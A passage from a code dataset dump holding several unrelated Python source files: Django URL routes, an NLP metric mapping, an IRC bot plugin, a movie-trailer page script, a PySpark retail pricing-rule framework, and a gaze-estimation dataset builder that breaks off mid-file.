path('login/', views.login, name='login'),\n path('vista_turnos/', views.turnos, name='turnos'),\n path('detalle_turnos/', views.vista_edicion_turnos, name='detalle_turnos'),\n path('vista_pacientes/', views.pacientes, name='pacientes'),\n path('detalle_pacientes/', views.vista_edicion_pacientes, name='detalle_pacientes'),\n path('vista_pedidos/', views.pedidos, name='pedidos'),\n path('detalle_pedidos/', views.vista_edicion_pedidos, name='detalle_pedidos'),\n path('menu_principal/', views.menu_principal, name='menu_principal'),\n path('zinggrid/', views.zinggrid, name='zinggrid'),\n path('detalle_heroes/', views.vista_edicion_heroes, name='detalle_heroes'),\n path('vista_historial/', views.historial, name='historial'),\n path('detalle_historial/', views.vista_edicion_historial, name='detalle_historial'),\n path('admin/', admin.site.urls),\n path('', include('myapi.urls')),\n path('', include('usuario.urls')),\n \n \n ]","sub_path":"crudexample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"556372422","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nfrom networkapi.api_neighbor.v4 import views\n\nurlpatterns = patterns(\n '',\n url(r'^neighbor/deploy/((?P[;\\w]+)/)?$',\n views.NeighborDeployView.as_view()),\n url(r'^neighbor/((?P[;\\w]+)/)?$',\n views.NeighborDBView.as_view()),\n\n)\n","sub_path":"networkapi/api_neighbor/v4/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"19234192","text":"# https://github.com/huggingface/datasets/blob/master/metrics/glue/glue.py\nfrom collections import OrderedDict\nimport typing\n\nmetric_mode_mapping_glue = {\n \"cola\": [(\"matthews_correlation\", \"max\")],\n \"mnli\": [(\"accuracy\", \"max\")],\n \"mrpc\": [(\"accuracy\", \"max\"), (\"f1\", \"max\")],\n \"qnli\": [(\"accuracy\", \"max\")],\n \"qqp\": [(\"accuracy\", \"max\"), (\"f1\", \"max\")],\n \"rte\": [(\"accuracy\", \"max\")],\n \"sst2\": [(\"accuracy\", \"max\")],\n \"stsb\": [(\"pearson\", \"max\"), (\"spearmanr\", \"max\")],\n \"wnli\": [(\"accuracy\", \"max\")]\n}\n\nmetric_mode_mapping_squad = [(\"exact_match\", \"max\"), (\"f1\", \"max\")]\n\nmetric_mode_mapping_super_glue = {\n \"axb\": [(\"matthews_correlation\", \"max\")],\n \"cb\": [(\"accuracy\", \"max\"), (\"f1\", \"max\")],\n \"copa\": [(\"accuracy\", \"max\")],\n \"rte\": [(\"accuracy\", \"max\")],\n \"wic\": [(\"accuracy\", \"max\")],\n \"wsc\": [(\"accuracy\", \"max\")],\n \"wsc.fixed\": [(\"accuracy\", \"max\")],\n \"boolq\": [(\"accuracy\", \"max\")],\n \"axg\": [(\"accuracy\", \"max\")]\n}\n\nmetric_mode_mapping_imdb = [(\"accuracy\", \"max\")]\n\nmetric_mode_mapping_yelp = [(\"accuracy\", \"max\")]\n\nMETRIC_MAPPING = OrderedDict(\n [\n (\"squad\", metric_mode_mapping_squad),\n (\"glue\", metric_mode_mapping_glue),\n (\"super_glue\", metric_mode_mapping_super_glue),\n (\"imdb\", metric_mode_mapping_imdb),\n (\"yelp_review_full\", metric_mode_mapping_yelp)\n ]\n)\n\n\ndef get_default_and_alternative_metric(dataset_name_list: typing.List,\n subdataset_name=None,\n custom_metric_name=None,\n custom_metric_mode_name=None):\n from ..result_analysis.azure_utils import JobID\n dataset_name = JobID.dataset_list_to_str(dataset_name_list)\n if dataset_name not in METRIC_MAPPING.keys():\n assert custom_metric_name and custom_metric_mode_name, \\\n \"The dataset is not in {}, you must explicitly specify \" \\\n \"the custom_metric_name and custom_metric_mode_name\".format(\",\".join(METRIC_MAPPING.keys()))\n eval_name_mapping = METRIC_MAPPING[dataset_name]\n if isinstance(eval_name_mapping, dict):\n assert subdataset_name and subdataset_name in eval_name_mapping, \\\n \"dataset_name and subdataset_name not correctly specified\"\n default_metric, default_mode = eval_name_mapping[subdataset_name][0]\n all_metrics, all_mode \\\n = [x[0] for x in eval_name_mapping[subdataset_name]] \\\n + [\"loss\"], [x[1] for x in eval_name_mapping[subdataset_name]] + [\"min\"]\n\n return default_metric, default_mode, all_metrics, all_mode\n else:\n assert isinstance(eval_name_mapping, list), \"dataset_name and subdataset_name not correctly specified\"\n\n default_metric, default_mode = eval_name_mapping[0]\n all_metrics, all_mode = [x[0] for x in eval_name_mapping] + [\"loss\"], \\\n [x[1] for x in eval_name_mapping] + [\"min\"]\n\n return default_metric, default_mode, all_metrics, all_mode\n","sub_path":"flaml/nlp/dataset/metric_auto.py","file_name":"metric_auto.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"154059099","text":"def main(data):\n args = False\n coms = [\"!G+\", \"!g+\"]\n if any(word.lower() in data['recv'].lower() for word in data['config']['settings']['blocklist']):\n return\n for com in coms:\n if com in data['recv']:\n args = argv(com, data['recv'])\n break\n if args:\n return say(args['channel'],\n 'https://plus.google.com/'\\\n 'hangouts/_/event/ch7k2ara9stvm6q0ubs7crkov9c'\n )\n","sub_path":"plugins/privmsg/hangout.py","file_name":"hangout.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"57833255","text":"import fresh_tomatoes\nimport media\n\"\"\"\nThis python file creates instances of a movie class to hold a large amount\nof important features. All movies are then put into an array and\nsent to the fresh_tomatoes python file.\n\"\"\"\n \ndespicable_me = media.Movie(\"Despicable Me\",\n \"Gru, finds that life isn't just about evil \"\n \"when he adopts three orphans and trys to attempt \"\n \"the greatest evil theft of all time.\",\n \"https://goo.gl/Itkltl\", # Google shortener link \n \"https://www.youtube.com/watch?v=RXZY_XRjABs\",\n 4, \"$251.5M\")\n\nwreck_it_ralph = media.Movie(\"Wreck-it Ralph\",\n \"A video game enemy decides to become his own \"\n \"hero and no longer be the \"\n \"bad guy of video games.\",\n \"https://goo.gl/tb6Z5P\",\n \"https://www.youtube.com/watch?v=87E6N7ToCxs\",\n 4, \"$189.4M\")\n\nbig_hero_six = media.Movie(\"Big Hero 6\",\n \"Hiro uses a robot built by his brother to fight \"\n \"an evil villian along with his friends with \"\n \"futuristic gadgets.\",\n \"https://goo.gl/bMv6Mb\",\n \"https://www.youtube.com/watch?v=z3biFxZIJOQ\",\n 4, \"$222.5M\")\n\n# Make a table of all my favourite movies\nmovies = [despicable_me, wreck_it_ralph, big_hero_six]\n# Run the open_movies_page in 'fresh_tomatoes.py'\nfresh_tomatoes.open_movies_page(movies)\n\n\n","sub_path":"entertainment.py","file_name":"entertainment.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"241185136","text":"from harlem125 import dp_rules as dpr\nfrom typing import List, Dict, Tuple\nfrom harlem125.exception_class import DP_Function_Definition_Err, DP_Rule_Check_Err\nfrom harlem125 import dp_util\nfrom functools import partial\nimport numpy as np\nfrom pyspark.sql.window import Window\nimport pyspark.sql.functions as F\nimport pyspark.sql.types as T\nfrom pyspark.sql import DataFrame\nimport time, datetime as dt\nimport pytz\nimport math\n\n\nclass Working_func_ext(dpr.Working_func):\n def __init__(self, pyfunc, desc=None):\n if desc is None:\n if type(pyfunc) == partial:\n desc = ' ----> '.join([x.desc for x in pyfunc.keywords['func_lst']])\n else:\n raise ValueError('Working_func desc cannot be empty')\n super().__init__(pyfunc, desc)\n\n\nclass min_margin_template:\n @staticmethod\n def apply_rule(df: DataFrame, min_margin_udf):\n return df \\\n .select('*',\n min_margin_udf(\n F.struct([df[x] for x in\n df.columns])\n ).alias('min_margin')\n ) \\\n .select([c for c in df.columns] + \\\n [F.col('min_margin.value').alias('min_margin'),\n F.col('min_margin.rule_name').alias('min_margin_rule_name')])\n\n @staticmethod\n def get_static_mm_udf(min_margin_mapping_input):\n def min_margin_mapping_index(row, min_margin_mapping):\n try:\n rettpl = min_margin_mapping(row)\n if type(rettpl) != tuple or len(rettpl) != 2:\n raise DP_Function_Definition_Err('Function return value must be a tuple and length of 2')\n return rettpl\n except KeyError as e:\n raise\n except DP_Function_Definition_Err:\n raise\n except Exception as e:\n return None, str(e)\n\n min_margin_mapping_partial = partial(min_margin_mapping_index, min_margin_mapping=min_margin_mapping_input)\n return F.udf(min_margin_mapping_partial, returnType=T.StructType.fromJson(\n {'fields': [\n {'metadata': {}, 'name': 'value', 'nullable': True, 'type': 'double'},\n {'metadata': {}, 'name': 'rule_name', 'nullable': True, 'type': 'string'}\n ],\n 'type': 'struct'}))\n\n\nclass min_comp_template:\n @staticmethod\n def apply_rule(df: DataFrame, min_comp_udf):\n def median(values_list):\n med = np.median(values_list)\n retval = float(med)\n if math.isnan(retval):\n return None\n return retval\n\n def group_concat(comp_name_lst):\n if comp_name_lst is None:\n return None\n else:\n return ','.join(comp_name_lst)\n\n udf_median = F.udf(median, T.DoubleType())\n udf_group_concat = F.udf(group_concat, T.StringType())\n price_window = (Window\n .partitionBy('div_no', 'itm_no')\n .orderBy('price'))\n\n base_raw = df.select('*',\n F.row_number().over(price_window) \\\n .alias('rn')) \\\n .filter('rn == 1') \\\n .drop('rn', 'price', 'comp_name')\n\n min_comp_all_raw = df \\\n .select('div_no', 'itm_no',\n 'price', 'comp_name',\n min_comp_udf(\n F.struct([df[x] for x in\n df.columns])\n ).alias('in_list')\n ) \\\n .filter('in_list.value').drop('in_list')\n\n min_comp_all = min_comp_all_raw \\\n .select('div_no', 'itm_no',\n F.col('price').alias('min_comp'),\n F.col('comp_name').alias('min_comp_NM'),\n F.rank().over(price_window) \\\n .alias('rn')) \\\n .filter('rn == 1') \\\n .drop('rn') \\\n .groupBy(['div_no', 'itm_no']) \\\n .agg(F.first(F.col('min_comp')).alias('min_comp'),\n udf_group_concat(F.collect_list(F.col('min_comp_NM'))).alias('min_comp_NM'))\n\n min_comp_mm = min_comp_all_raw \\\n .filter('price >= min_margin') \\\n .select('div_no', 'itm_no',\n F.col('price').alias('min_comp_MM'),\n F.col('comp_name').alias('min_comp_MM_NM'),\n F.rank().over(price_window) \\\n .alias('rn')) \\\n .filter('rn == 1') \\\n .drop('rn') \\\n .groupBy(['div_no', 'itm_no']) \\\n .agg(F.first(F.col('min_comp_MM')).alias('min_comp_MM'),\n udf_group_concat(F.collect_list(F.col('min_comp_MM_NM'))).alias('min_comp_MM_NM'))\n\n median_df = df.groupby(['div_no', 'itm_no']) \\\n .agg(udf_median(F.collect_list(F.col('price'))).alias('median_comp'))\n avg_max_df = min_comp_all_raw.groupby(['div_no', 'itm_no']) \\\n .agg(F.avg(F.col('price')).alias('avg_comp'), F.max(F.col('price')).alias('max_comp'))\n # max_df = min_comp_all_raw.groupby(['div_no', 'itm_no']) \\\n # .agg(F.max(F.col('price')).alias('max_comp'))\n\n return base_raw \\\n .join(min_comp_all, on=['div_no', 'itm_no'], how='left') \\\n .join(min_comp_mm, on=['div_no', 'itm_no'], how='left') \\\n .join(avg_max_df, on=['div_no', 'itm_no'], how='left') \\\n .join(median_df, on=['div_no', 'itm_no'], how='left')\n\n @staticmethod\n def get_min_comp_udf(min_comp_mapping_input):\n def min_comp_mpping_index(row, min_comp_mapping):\n try:\n rettpl = min_comp_mapping(row)\n if type(rettpl) != tuple or len(rettpl) != 2:\n raise DP_Function_Definition_Err('Function return value must be a tuple and length of 2')\n return rettpl\n except KeyError as e:\n raise\n except DP_Function_Definition_Err:\n raise\n except Exception as e:\n return False, str(e)\n\n min_comp_mpping_index_partial = \\\n partial(min_comp_mpping_index, min_comp_mapping=min_comp_mapping_input)\n return F.udf(min_comp_mpping_index_partial, returnType=T.StructType.fromJson(\n {\n 'fields': [\n {'metadata': {}, 'name': 'value', 'nullable': True, 'type': 'boolean'},\n {'metadata': {}, 'name': 'rule_name', 'nullable': True, 'type': 'string'}\n ],\n 'type': 'struct'\n }\n ))\n\n\nclass DP_Rule_Constructor:\n def __init__(self, rule_level, scope, rule_name, additional_source: dict = None, critical=False,\n rule_start_dt=None, rule_end_dt=None, is_active=None,\n\n desc='', *args, **kwargs):\n\n self.sears_online_rule_schema = [\n # TODO: DEFINE rule name and schema here\n ('pre_rule', 'boolean'),\n ('core_rule', 'double'),\n ('uplift_rule', 'double'),\n ('post_rule', 'double'),\n ('deal_flag_rule', 'string'),\n ('day_range_rule', 'integer'),\n ('priority', 'integer')\n ] # type: List[Tuple[str,str]]\n\n target_tbl_name = 'rule_table'\n if_exists = 'append'\n self.scope = scope\n rule_active = True if is_active is None else is_active\n inactive_reason = '' if is_active is None else 'Preset: OFF'\n time_now = (dt.datetime.now(pytz.timezone('America/Chicago'))).replace(tzinfo=None)\n self.time_now = time_now\n self.rule_start_dt = dt.datetime(*tuple(time.gmtime(0)[:6])) if rule_start_dt is None else rule_start_dt\n rule_end_dt = dt.datetime(9999, 12, 31, 23, 59, 59) if rule_end_dt is None else rule_end_dt\n self.rule_end_dt = rule_end_dt.replace(hour=23, minute=59, second=59) # Extend enddate to oneday\n # time check\n if rule_active is True:\n if not self.rule_start_dt < time_now < self.rule_end_dt:\n rule_active, inactive_reason = \\\n False, 'Rule inactive [{}, {}]'.format(self.rule_start_dt.strftime('%Y-%m-%d %H:%M:%S'),\n self.rule_end_dt.strftime('%Y-%m-%d %H:%M:%S'))\n\n # additional_source check\n if rule_active is True:\n if additional_source is not None:\n try:\n assert type(additional_source) == dict, \\\n 'additional_source type error, expect dict got {}'.format(type(additional_source))\n\n if len(additional_source) > 0:\n for key, item in additional_source.items():\n assert 'table_name' in item and 'key' in item, 'additional_source format error'\n if dp_util.tbl_exists(item['table_name']) is False:\n raise DP_Rule_Check_Err('Table {} not found'.format(item['table_name']))\n except (DP_Rule_Check_Err, AssertionError) as e:\n rule_active = False\n inactive_reason = str(e)\n if critical:\n raise\n # TODO: DEFINE rule_level prefix, may cause column name duplication when multiple interfaces exists\n self.rule_level_prefix = ''\n self.thisrule = dpr.Harlem_Rule(\n target_tbl_name=target_tbl_name,\n additional_source=additional_source,\n select_schema=(\n # TODO: DEFINE schema for rule_table here\n 'div_no',\n 'itm_no',\n 'reg', # redundant\n 'cost_with_subsidy', # redundant\n 'min_margin',\n 'min_margin_rule_name',\n 'min_comp_MM',\n 'min_comp_MM_NM',\n 'min_comp',\n 'min_comp_NM',\n 'avg_comp',\n 'max_comp',\n 'median_comp',\n 'uplift',\n 'Harlem_Rule.pre_rule_value as pre_rule_value',\n 'Harlem_Rule.pre_rule_name as pre_rule_name',\n 'Harlem_Rule.core_rule_value as core_rule_value',\n 'Harlem_Rule.core_rule_name as core_rule_name',\n 'Harlem_Rule.uplift_rule_value as uplift_rule_value',\n 'Harlem_Rule.uplift_rule_name as uplift_rule_name',\n 'Harlem_Rule.post_rule_value as post_rule_value',\n 'Harlem_Rule.post_rule_name as post_rule_name',\n 'Harlem_Rule.deal_flag_rule_value as deal_flag_value',\n 'Harlem_Rule.deal_flag_rule_name as deal_flag_rule_name',\n 'Harlem_Rule.day_range_rule_value as day_range',\n 'Harlem_Rule.day_range_rule_name as day_range_rule_name',\n 'Harlem_Rule.priority_value as priority',\n 'Harlem_Rule.priority_name as priority_rule_name',\n '{}rule_level'.format(self.rule_level_prefix),\n 'run_id'),\n is_active=rule_active,\n inactive_rsn=inactive_reason,\n rule_level=rule_level,\n rule_level_prefix=self.rule_level_prefix,\n rule_name=rule_name,\n if_exists=if_exists,\n desc=desc,\n *args,\n **kwargs\n )\n\n # TODO: DEFINE default rules here\n @staticmethod\n def default_pre_rule(row):\n return True, 'pass'\n\n @staticmethod\n def default_core_rule(row):\n return None, None\n\n @staticmethod\n def default_uplift_rule(row):\n return row['core_rule_value'], 'No Uplift'\n\n @staticmethod\n def default_post_rule(row):\n return round(row['uplift_rule_value'], 2), 'No post_rule'\n\n @staticmethod\n def defalut_deal_flag_rule(row):\n return 'N', 'Default Deal Flag 1'\n\n @staticmethod\n def default_price_day(row, batch_date_str):\n if row['reg'] - row['post_rule_value'] < 0.01:\n return 0, 'Default 1-day delete_flag'\n else:\n if 0 <= row['run_id'] < 43200: # Morning run, push 1 day:\n day_range = 0, 'Morning run, 1 day'\n else:\n day_range = 1, 'Default 2-day pricing'\n batch_dt = dt.datetime.strptime(batch_date_str, '%Y-%m-%d')\n daydiff = (dt.datetime.strptime(row['rule_end_date'], '%Y-%m-%d') - batch_dt).days\n if daydiff < day_range[0]:\n day_range = daydiff, 'bound by incoming dp rule ending'\n if row['uplift_end_dt'] is not None:\n daydiff = (dt.datetime.strptime(row['uplift_end_dt'], '%Y-%m-%d') - batch_dt).days\n if daydiff < day_range[0]:\n day_range = daydiff, 'bound by incoming uplift ending'\n return day_range\n\n @staticmethod\n def default_priority(row):\n return int(row['run_id'] // 60), 'Default priority'\n\n def get_merge_func(self):\n raise Exception(\"NotImplementedException\")\n\n def get_min_margin_func(self):\n raise Exception(\"NotImplementedException\")\n\n def get_min_comp_func(self):\n raise Exception(\"NotImplementedException\")\n\n def assemble_min_margin_func(self) -> dpr.DP_func:\n min_margin_udf = min_margin_template.get_static_mm_udf(self.get_min_margin_func())\n return dpr.DP_func(\n min_margin_template.apply_rule,\n func_desc='Apply static_table_MM udf function',\n pyudf=min_margin_udf\n )\n\n def assemble_min_comp_func(self) -> dpr.DP_func:\n min_comp_udf = min_comp_template.get_min_comp_udf(self.get_min_comp_func())\n return dpr.DP_func(\n min_comp_template.apply_rule,\n func_desc='Apply comp udf function',\n pyudf=min_comp_udf\n )\n\n def add_rule_end_date(self):\n def add_script_end_date(df: DataFrame, rule_end_date):\n return df.withColumn('rule_end_date', F.lit(rule_end_date).cast(T.StringType()))\n\n return add_script_end_date\n\n # ---------------------------------------- #\n\n def get_pre_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_core_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_uplift_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_post_rule(self) -> List[dpr.Working_func]: # Core rule price filter applied\n raise Exception(\"NotImplementedException\")\n\n def get_deal_flag_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_day_range_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_priority_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_rule_func(self) -> dpr.DP_func:\n total_func = [self.get_pre_rule(), self.get_core_rule(),\n self.get_uplift_rule(), self.get_post_rule(),\n self.get_deal_flag_rule(), self.get_day_range_rule(), self.get_priority_rule()]\n\n total_func[0].append(dpr.Working_func(self.default_pre_rule, 'Pass pre_rule'))\n\n total_func[1].append(dpr.Working_func(self.default_core_rule, 'No core_rule'))\n\n total_func[2].append(dpr.Working_func(self.default_uplift_rule, 'No uplift_rule'))\n\n total_func[3].append(dpr.Working_func(self.default_post_rule, 'No post_rule'))\n\n total_func[4].append(dpr.Working_func(self.defalut_deal_flag_rule, 'Deal_flag N'))\n\n total_func[5].append(dpr.Working_func(partial(self.default_price_day,\n batch_date_str=self.time_now.strftime('%Y-%m-%d')),\n 'Default 2-day pricing, 1-day Delete flag'))\n total_func[6].append(dpr.Working_func(self.default_priority, 'Default priority: 0 (minimum)'))\n total_rule_lst = []\n for idx, each_tuple in enumerate(self.sears_online_rule_schema):\n total_rule_lst.append((each_tuple[0], each_tuple[1], total_func[idx]))\n return self.thisrule.rule_wrapper(total_rule_lst)\n\n def construct_rule(self) -> dpr.Harlem_Rule:\n self.thisrule.add_rule_layer(dpr.DP_func(self.get_merge_func(), input_type='Dict'), args=(self.scope,))\n self.thisrule.add_rule_layer(dpr.DP_func(self.add_rule_end_date()),\n args=(self.rule_end_dt.strftime('%Y-%m-%d'),))\n self.thisrule.add_rule_layer(self.assemble_min_margin_func())\n self.thisrule.add_rule_layer(self.assemble_min_comp_func())\n self.thisrule.add_rule_layer(self.get_rule_func())\n return self.thisrule\n","sub_path":"Sears_Online_Rule/harlem125_interface.py","file_name":"harlem125_interface.py","file_ext":"py","file_size_in_byte":16838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417988913","text":"#create dataset to regression forests\n# coding: utf-8\nimport os\nimport numpy as np\n\nimport torch\nimport torch.utils.data\n\n#groups=[theta,phi]\ndef can_be_center(groups,theta,phi,numGrps,curr_dist):\n\tfor i in range(numGrps):\n\t\tif np.sqrt( (groups[i][0]-theta)**2 + (groups[i][1]- phi)**2 ) < curr_dist:\n\t\t#if np.sqrt( (groups[i][0]-theta)<<1 + (groups[i][1]- phi)<<1 ) < curr_dist:\n\t\t\treturn False\n\t#print(\"new center!!!!!\")\n\treturn True\n\n####\ndef find_nearest_group(theta,phi,groups_centers):\n\tminDst = 100;\n\tmaxDist=0.3\n\tnearestGrp = -1; \n\tfor i in range(len(groups_centers)):\n\t\tif abs(groups_centers[i,0]-theta) < maxDist and abs(groups_centers[i,1]-phi) < maxDist: \n\t\t\tdist= abs(groups_centers[i,0]-theta)+abs(groups_centers[i,1]-phi)\n\t\t\tif dist < minDst:\n\t\t\t\tminDst=dist\n\t\t\t\tnearestGrp=i\n\n\tif nearestGrp==-1:\n\t\tprint(\"probleeeeeeeeeeemmmmmmmmmmmmmmmmmmmmm\")\n\t\tprint(\"len:\",)\n\t\tprint(\"minDst:\",minDst)\n\treturn nearestGrp\n\ndef find_R_nearest_groups(centerTheta, centerPhi, groups_centers, R, first, NUM_OF_GROUPS):\n\tlistOfGroupIds=[-1 for i in range(R+1)]\n\tlistOfGroupIds[0] = first+1\n\tminDist=[]#zeros(R+1)\n\tfor i in range(R+1):\n\t\tminDist.append(7+i)\n\n\tfor i in range(NUM_OF_GROUPS):\n\t\tif i != first:#fi+1 not in listOfGroupIds:\n \t\t\tdist = abs(groups_centers[i][0]-centerTheta) + abs(groups_centers[i][1]-centerPhi)\n \t\t\tif dist < minDist[R]:\n \t\t\t\tfor o in range(1,R+1):\n \t\t\t\t\tif dist < minDist[o]:\n \t\t\t\t\t\tif o == R:\n \t\t\t\t\t\t\tlistOfGroupIds[o]=i+1\n \t\t\t\t\t\t\tminDist[o]=dist\n \t\t\t\t\t\telse:\n \t\t\t\t\t\t\tj=R-1\n \t\t\t\t\t\t\twhile j >= o:\n \t\t\t\t\t\t\t\tlistOfGroupIds[j+1]=listOfGroupIds[j]\n \t\t\t\t\t\t\t\tminDist[j+1]=minDist[j]\n \t\t\t\t\t\t\t\tj=j-1\n \t\t\t\t\t\t\tlistOfGroupIds[o]=i+1\n \t\t\t\t\t\t\tminDist[o]=dist\n \t\t\t\t\t\tbreak\n\t#print(\"final list:\",listOfGroupIds)\n\treturn np.array(listOfGroupIds)\n\nimport h5py\n#initialize data\ngroups_poses={}\ngroups_gazes={}\ngroups_images={}\ngroups_nearests={}\n\nnumGrps=0;groups_centers=[]\nsubject_ids = ['p{:02}'.format(index) for index in range(15)]\ndataset_dir='/home/olympia/MPIIGaze/python/pytorch/data/'\ncurr_dist = 0.05#[0.03 0.04 0.05 0.06 0.07];%evgala to 0.06\n\n\nprint(subject_ids) \nfor subject_id in subject_ids[0:2]:#(0,5,10,15)\n\tpath = os.path.join(dataset_dir, '{}.npz'.format(subject_id ))\n\t#/home/olympia/MPIIGaze/python/pytorch/data/p12.npz\n\t\n\twith np.load(path) as fin:\n\t\timages = fin['image']#[0:2400]\n\t\tposes = fin['pose']#[0:2400]\n\t\tgazes = fin['gaze']#[0:2400]\n\t\tlength = len(images)\n\n\tfor i in range(len(poses[:,1])):\n\t\t#can_be_center(groups,theta,phi,numGrps,curr_dist):\n\n\t\tanswer = True\n\n\t\t##### can_be_center_or_not ###\n\t\tfor j in range(numGrps):\n\t\t\tif np.sqrt( (groups_centers[j][0]-poses[i][0])**2 + (groups_centers[j][1]- poses[i][1])**2 ) < curr_dist:\n\t\t\t\t#if np.sqrt( (groups[i][0]-theta)<<1 + (groups[i][1]- phi)<<1 ) < curr_dist:\n\t\t\t\tanswer = False\n\t\tif answer==True:\t\n\t\t\tgroups_centers.append(poses[i,:])#([poses[i,0],poses[i,1]])\n\n\n\t\t\t# groups_poses[numGrps] = []#struct(gazes,poses,data)\n\t\t\t# groups_gazes[numGrps] = []\n\t\t\t# groups_images[numGrps] = []\n\t\t\t# groups_nearests[numGrps]=[]\t\n\t\t\t# groups_poses[numGrps].append(poses[i,:])\n\t\t\t# groups_gazes[numGrps].append(gazes[i,:])\n\t\t\t# groups_images[numGrps].append(images[i,0,13:22,22:37])\n\t\t\t# groups_nearests[numGrps]=[numGrps]#isws exei thema edw.Vale \"-1\" an xreiastei\n\t\t\t# groups_poses[nearestGrp].append(poses[i,:])\n\t\t\t# groups_gazes[nearestGrp].append(gazes[i,:])\n\t\t\t# groups_images[nearestGrp].append(images[i,0,13:22,22:37])\n\t\t\tnumGrps=numGrps+1\n\t\t\t#print(\"new center!!!!!\")\n\n#print(\"NumOfCenters:\",numGrps)\nprint(\"numGrps:\",numGrps)\n#gia ta regression forests,prepei na kanoume reshape ta data.Opote,anti gia 60x36,\n#to resolution einai 16x9\ngroups_centers=np.array(groups_centers)\nw=0\nfor i in range(numGrps):\n\tgroups_poses[i] = []#struct(gazes,poses,data)\n\tgroups_gazes[i] = []\n\tgroups_images[i] = []\n\tgroups_nearests[i]=[]\t\n\nfor subject_id in subject_ids[0:2]:\n\tpath = os.path.join(dataset_dir, '{}.npz'.format(subject_id ))\n\t#/home/olympia/MPIIGaze/python/pytorch/data/p12.npz\n\twith np.load(path) as fin:\n\t\timages= np.empty((3000, 1, 36, 60))\n\t\timages[:,0,:,:] = fin['image']*255\n\t\t#images[:,0,0:9,0:16]=images[:,0,13:22,22:38]#images[:,22:37,13:22]\n\t\tposes = fin['pose']#[0:2400]\n\t\tgazes = fin['gaze']#[0:2400]\n\t\t#length = len(images)\n\n\t#img = temp.data.left.image(num_i, 14:22, 23:37);\n #img = reshape(img, HEIGHT ,WIDTH);\n\n\t### for every training sample ###\n\tfor i in range(len(poses[:,1])):\n\t\t### find_nearest_group() ###\n\t\tminDst=1000\n\t\tmaxDist=0.3;\n\t\t\n\t\tfor j in range(numGrps):\n\n\t\t\tif abs(groups_centers[j,0]-poses[i,0]) < maxDist and abs(groups_centers[j,1]-poses[i,1]) < maxDist: \n\t\t\t\tdist= abs(groups_centers[j,0]-poses[i,0])+abs(groups_centers[j,1]-poses[i,1]);\n\t\t\t\tif dist < minDst:\n\t\t\t\t\tminDst=dist\n\t\t\t\t\tnearestGrp=j\n\t\tif minDst==0:\n\t\t\tw=w+1\n\t\t\t#print(\"grps:\",numGrps,\"popa:\",w)\n\n\t\t\n\t\t#print(\"Added to Group:\",nearestGrp)\n\t\tgroups_poses[nearestGrp].append(poses[i,:])\n\t\tgroups_gazes[nearestGrp].append(gazes[i,:])\n\t\tgroups_images[nearestGrp].append(images[i,0,13:22,22:37])#images[:,0,13:22,22:38]\n\t\t#groups_nearests[i].append(j)\t\t\t\t\t\t\n#from PIL import Image\n#im = Image.fromarray(images[10,0,13:22,22:37])#np.flip(images[10]))\n#im.show()\n\nRADIUS=60\n\nwith h5py.File('small_train_dataset.h5','w') as hdf:\n\tfor i in range(numGrps):\n\t g=hdf.create_group('g'+str(i+1))\n\t g.create_dataset('gaze',data=groups_gazes[i],dtype='f8')\n\t g.create_dataset('headpose',data=groups_poses[i],dtype='f8')\n\t images_final= np.empty((len(groups_images[i]), 1, 9, 15))\n\t #(images_final.shape)=(53, 1, 9, 16)\n\t groups_images[i]=np.array(groups_images[i])\n\t #print('i=',i,groups_images[i].shape)#problima an den uparxoun arketa deigmata\t \n\t #print(\"i is:\", i, \"numGrps:\",len(groups_images[i]))\n\t images_final[:,0,:,:]=groups_images[i][:,:,:]\n\n\n\n\t images_final.astype('uint8') \n\t g.create_dataset('data',data=images_final,dtype='uint8')\n\t g.create_dataset('center',data=groups_centers[i].transpose(),dtype='f8')\n\t g.create_dataset('samples',data=len(groups_gazes[i]),dtype='uint32')\n\t listOfGroupIds=find_R_nearest_groups(centerTheta=groups_centers[i][0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t centerPhi=groups_centers[i][1],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t groups_centers=groups_centers,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t R=RADIUS,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t first=i,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t NUM_OF_GROUPS=len(groups_centers))\n\t g.create_dataset('nearestIDs',data=listOfGroupIds,dtype='uint32')\n\t groups_nearests[i].append(listOfGroupIds)\n\n###### TEST DATA #####\nwith h5py.File('small_test_dataset.h5','w') as hdf:\n\tgaze_dset=hdf.create_dataset('gaze',(0,2),maxshape=(None,2),dtype='f8')\n\tpose_dset=hdf.create_dataset('headpose',(0,2),maxshape=(None,2),dtype='f8')\n\timage_dset=hdf.create_dataset('data',(0,1,9,15),maxshape=(None,1,9,15),dtype='uint8')\n\tnearests_dset = hdf.create_dataset('nearestIDs',(0,RADIUS+1),maxshape=(None,RADIUS+1),dtype='uint32')\n\t\t\t\n\tfor subject_id in subject_ids[3:4]:\n\t\tpath = os.path.join(dataset_dir, '{}.npz'.format(subject_id ))\n\t\t#/home/olympia/MPIIGaze/python/pytorch/data/p12.npz\n\t\twith np.load(path) as fin:#dynamic 